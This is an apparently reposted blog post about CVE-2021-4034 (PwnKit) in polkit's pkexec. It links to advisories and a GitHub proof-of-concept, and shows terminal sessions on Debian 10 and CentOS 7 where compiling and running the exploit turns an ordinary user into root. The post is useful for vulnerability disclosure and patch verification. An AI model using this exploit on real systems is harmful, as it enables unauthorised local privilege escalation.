CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄

CVE-2021-4034

While the vulnerability is not exploitable remotely and doesn’t, in itself, allow arbitrary code execution, it can be used by attackers that have already gained a foothold on a vulnerable host to escalate their privileges and a…


This content originally appeared on DEV Community and was authored by Yaku

CVE-2021-4034

While the vulnerability is not exploitable remotely and doesn’t, in itself, allow arbitrary code execution, it can be used by attackers that have already gained a foothold on a vulnerable host to escalate their privileges and achieve that capability.

https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

Verified on Debian 10 and CentOS 7.

You can find the repo at this link here → https://github.com/Yakumwamba/POC-CVE-2021-4034.git

yaku@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
yaku@debian:~$ id
uid=1000(user) gid=1000(yaku) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
yaku@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
yaku@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(yaku)
[yaku@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[yaku@centos ~]$ id
uid=11000(yaku) gid=11000(yaku) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[yaku@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[yaku@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit

What is polkit?

Polkit is a daemon that manages system processes and policies. It is used by system administrators to control which users and applications can have access to certain system resources.

*whoami? *
YAkU


This content originally appeared on DEV Community and was authored by Yaku


Print Share Comment Cite Upload Translate Updates
APA

Yaku | Sciencx (2022-01-28T16:15:05+00:00) CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄. Retrieved from https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/

MLA
" » CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄." Yaku | Sciencx - Friday January 28, 2022, https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/
HARVARD
Yaku | Sciencx Friday January 28, 2022 » CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄., viewed ,<https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/>
VANCOUVER
Yaku | Sciencx - » CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄. [Internet]. [Accessed ]. Available from: https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/
CHICAGO
" » CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄." Yaku | Sciencx - Accessed . https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/
IEEE
" » CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄." Yaku | Sciencx [Online]. Available: https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/. [Accessed: ]
rf:citation
» CVE-2021-4034: The new vulnerability everyone has been talking about – PoC 🙄 | Yaku | Sciencx | https://www.scien.cx/2022/01/28/cve-2021-4034-the-new-vulnerability-everyone-has-been-talking-about-poc-%f0%9f%99%84/ |

Please log in to upload a file.




There are no updates yet.
Click the Upload button above to add an update.

You must be logged in to translate posts. Please log in or register.